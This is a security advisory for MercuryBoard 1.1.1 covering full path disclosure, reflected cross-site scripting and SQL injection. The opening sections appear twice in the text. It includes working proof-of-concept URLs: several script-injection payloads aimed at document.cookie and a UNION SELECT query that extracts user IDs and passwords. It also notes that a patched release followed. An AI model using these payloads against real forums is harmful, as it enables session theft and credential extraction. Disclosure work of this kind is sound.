*************************************************************
* CODEBUG Labs
* Advisory #7
* Title: Multiple vulnerabilities in MercuryBoard 1.1.1
* Author: Alberto Trivero
* English Version: Alberto Trivero
* Product: MercuryBoard 1.1.1
* Type: Multiple Vulnerabilities
* Web: http://www.codebug.org/
*************************************************************
--) Software Page (www.mercuryboard.com)
"MercuryBoard is a powerful message board system dedicated to raw speed with
a mixture of
features, ease of use, and ease of customization coupled with expandability,
and diverse
language services." Note that is write in PHP OOP.
--) Full Path Disclosure
Let's look at original code from global.php line 604:
As we can see there isn't a control to $num and so if we simply assign to
$num the value 0
(or a not numerical argument), there will be an impossible division by zero
that show the
full path:
For the same reason because it's possible to execute the XSS codes described
before, it's
also possible to do SQL Injection attacks. But in this case it's a
non-critical bug, why?
Because we need first login as forum administrator to make successful
attack. For example:
With the URL before we get, for the just described reason, an error like
this (verified
only on MercuryBoard 1.1.0):
The used SELECT statements have a different number of columns
--) Patch
After the report to developer of the board of these bugs, they released the
version 1.1.2
of MercuryBoard that correct them:
http://www.mercuryboard.com/index.php?a=downloads
* CODEBUG Labs
* Advisory #7
* Title: Multiple vulnerabilities in MercuryBoard 1.1.1
* Author: Alberto Trivero
* English Version: Alberto Trivero
* Product: MercuryBoard 1.1.1
* Type: Multiple Vulnerabilities
* Web: http://www.codebug.org/
*************************************************************
--) Software Page (www.mercuryboard.com)
"MercuryBoard is a powerful message board system dedicated to raw speed with
a mixture of
features, ease of use, and ease of customization coupled with expandability,
and diverse
language services." Note that is write in PHP OOP.
--) Full Path Disclosure
Let's look at original code from global.php line 604:
<?
...
// some base variables
$current = ceil($min / $num);
$string = null;
$pages = ceil($rows / $num);
$end = ($pages - 1) * $num;
...
?>
As we can see there isn't a control to $num and so if we simply assign to
$num the value 0
(or a not numerical argument), there will be an impossible division by zero
that show the
full path:
http://www.sitewithmercuryboard.com/index.php?a=forum&f=2&min=0&n=0
Other Full Path Disclosure:
http://www.sitewithmercuryboard.com/lib/jpgraph/jpgraph_bar.php
http://www.sitewithmercuryboard.com/lib/jpgraph/jpgraph_log.php
http://www.sitewithmercuryboard.com/lib/jpgraph/jpgraph_polar.php
http://www.sitewithmercuryboard.com/admincp/admin.php
http://www.sitewithmercuryboard.com/func/[file] <--- All the PHP file in
the dyrectory:
active.php board.php
constants.php cp.php
debug.php email.php forum.php
help.php login.php
members.php mod.php pm.php
post.php printer.php
profile.php register.php
search.php topic.php
--) Cross-Site Scripting (XSS)
Let's look at original code from /func/pm.php line 36:
<?
...
if (!isset($this->get['s'])) {
$this->get['s'] = null;
}
switch($this->get['s'])
{
case 'send':
return $this->send();
break;
case 'view':
return $this->view();
break;
case 'delete':
return $this->delete_pm();
break;
case 'clear':
return $this->clear();
break;
default:
return $this->folder();
break;
}
...
?>
As we can see there is a switch/case cycle to get 's' but in this cycle
there isn't any
check if we put other parameter with 's', like this XSS code:
http://www.sitewithmercuryboard.com/index.php?a=pm&s='><script>alert(doc
ument.cookie)</script>
Let's look again at original code from /func/members.php line 35:
<?
...
if (!isset($this->get['l'])) {
$this->get['l'] = null;
} else {
$this->get['l'] = strtoupper($this->get['l']);
}
...
?>
As we can see, also in this case, there isn't parsing methods for the
processing of 'l',
so nothing can prevent us from doing an XSS attack:
http://www.sitewithmercuryboard.com/index.php?a=members&l='><script>aler
t(document.cookie)</script>
Other Cross-Site Scripting:
http://www.sitewithmercuryboard.com/index.php?a='><script>alert(document
.cookie)</script>
http://www.sitewithmercuryboard.com/index.php?a=post&s='><script>alert(d
ocument.cookie)</script>
http://www.sitewithmercuryboard.com/index.php?a=post&s=reply&t='><script
>alert(document.cookie)</script>
http://www.sitewithmercuryboard.com/index.php?a=pm&s=send&to='><script>a
lert(document.cookie)</script>
http://www.sitewithmercuryboard.com/index.php?a=pm&s=send&to=2&re='><scr
ipt>alert(document.cookie)</script>
http://www.sitewithmercuryboard.com/index.php?a=cp&s='><script>alert(doc
ument.cookie)</script>
--) SQL Injection
For the same reason because it's possible to execute the XSS codes described
before, it's
also possible to do SQL Injection attacks. But in this case it's a
non-critical bug, why?
Because we need first login as forum administrator to make successful
attack. For example:
http://www.sitewithmercuryboard.com/index.php?a=post&s=reply&t=0%20UNION
%20SELECT%20user_id,%20user_password%20FROM%20mb_users%20/*
With the URL before we get, for the just described reason, an error like
this (verified
only on MercuryBoard 1.1.0):
The used SELECT statements have a different number of columns
--) Patch
After the report to developer of the board of these bugs, they released the
version 1.1.2
of MercuryBoard that correct them:
http://www.mercuryboard.com/index.php?a=downloads
*************************************************************
http://www.codebug.org
*************************************************************
[ reply ]